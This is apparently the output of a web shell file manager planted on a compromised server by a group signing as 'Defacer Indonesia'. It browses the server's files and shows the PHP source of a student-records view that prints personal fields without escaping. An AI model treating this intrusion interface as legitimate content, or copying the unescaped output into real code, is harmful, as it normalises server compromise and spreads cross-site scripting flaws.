whoami7 - Manager
:
/
proc
/
self
/
root
/
home
/
papecmvm
/
www
/
application
/
views
/
Upload File:
files >> //proc/self/root/home/papecmvm/www/application/views/view_students.php
<?php require_once(APPPATH.'views/header.php');?> <?php require_once(APPPATH.'views/menu.php');?> <style> th{ text-transform:capitalize; } </style> <!-- Content Wrapper. Contains page content --> <div class="content-wrapper"> <!-- Content Header (Page header) --> <section class="content-header"> <h1> Registered Student </h1> <ol class="breadcrumb"> <li><a href="<?php echo site_url('admin/Welcome')?>"><i class="fa fa-dashboard"></i> Dashboard</a></li> <li class="active">Registered Student</li> </ol> </section> <!-- Main content --> <section class="content"> <!-- /.row --> <div class="row"> <div class="col-xs-12"> <div class="box"> <div class="box-body"> <table id="example1" class="table table-bordered table-striped"> <tr> <th>Name</th> <td><?php echo $view[0]['name']; ?></td> </tr> <tr> <th>Joining Date</th> <td><?php echo $view[0]['joining_date']; ?></td> </tr> <tr> <th>Type of membership</th> <td><?php echo $view[0]['typeofmembership']; ?></td> </tr> <tr> <th>receipt no</th> <td><?php echo $view[0]['rcpt_no']; ?></td> </tr> <tr> <th>membership amount</th> <td><?php echo $view[0]['memb_amt']; ?></td> </tr> <tr> <th>membership amount paid by</th> <td><?php echo $view[0]['memb_amt_paidby']; ?></td> </tr> <tr> <th>date of birth</th> <td><?php echo $view[0]['dob']; ?></td> </tr> <tr> <th>contact no</th> <td><?php echo $view[0]['contact_no']; ?></td> </tr> <tr> <th>alternative contact no</th> <td><?php echo $view[0]['alt_contact_no']; ?></td> </tr> <tr> <th>home address</th> <td><?php echo $view[0]['home_address']; ?></td> </tr> <tr> <th>gender</th> <td><?php echo $view[0]['gender']; ?></td> </tr> <tr> <th>other address</th> <td><?php echo $view[0]['other_address']; ?></td> </tr> <tr> <th>email</th> <td><?php echo $view[0]['email']; ?></td> </tr> <tr> <th>higher secondary</th> <td><?php echo $view[0]['highersecondary']; ?></td> </tr> <tr> <th>sharing email id</th> <td><?php echo $view[0]['sharingemailid']; ?></td> </tr> <?php /*<tr> <th>higher secondary score</th> <td><?php echo $view[0]['highersecondaryscore']; ?></td> </tr> <tr> <th>graduation</th> <td><?php echo $view[0]['graduation']; ?></td> </tr> <tr> <th>graduationa score</th> <td><?php echo $view[0]['graduationascore']; ?></td> </tr>*/ ?> <tr> <th>graduationa year</th> <td><?php echo $view[0]['graduationayear']; ?></td> </tr> <?php /*<tr> <th>post graduation</th> <td><?php echo $view[0]['postgraduation']; ?></td> </tr>*/ ?> <tr> <th>post graduation score</th> <td><?php echo $view[0]['postgraduationscore']; ?></td> </tr> <tr> <th>post graduation year</th> <td><?php echo $view[0]['postgraduationyear']; ?></td> </tr> <tr> <th>field of study</th> <td><?php echo $view[0]['fieldofstudy']; ?></td> </tr> <tr> <th>field of studyo ther information</th> <td><?php echo $view[0]['fieldofstudyotherinfo']; ?></td> </tr> <?php /*<tr> <th>degree sought</th> <td><?php echo $view[0]['degreesought']; ?></td> </tr> */ ?> <?php /*<tr> <th>Intended Major / Concentration/ Subject / Field of Study</th> <td><?php echo $view[0]['intendedmajor']; ?></td> </tr> */ ?> <tr> <th>academic intake</th> <td><?php echo $view[0]['academic_intake']; ?></td> </tr> <?php /*<tr> <th>toefl score</th> <td><?php echo $view[0]['toefl_score']; ?></td> </tr> <tr> <th>gre score</th> <td><?php echo $view[0]['gre_score']; ?></td> </tr> <tr> <th>gmat score</th> <td><?php echo $view[0]['gmat_score']; ?></td> </tr> <tr> <th>sat/act score</th> <td><?php echo $view[0]['sat_act_score']; ?></td> </tr>*/?> <tr> <th>how did you know?</th> <td><?php echo $view[0]['howdidyouknow']; ?></td> </tr> <tr> <th>Test Scores - Whichever is applicable (E.g.TOEFL/GRE/GMAT/SAT/ACT)</th> <td><?php echo $view[0]['test_scores']; ?></td> </tr> <tr> <th>Field of Graduation </th> <td><?php echo $view[0]['field_of_graduation']; ?></td> </tr> </table> </div><!-- /.box-body --> </div><!-- /.box --> </div> </div> </section><!-- /.content --> </div><!-- /.content-wrapper --> <?php require_once(APPPATH.'views/footer.php');?>
Copyright ©2021 || Defacer Indonesia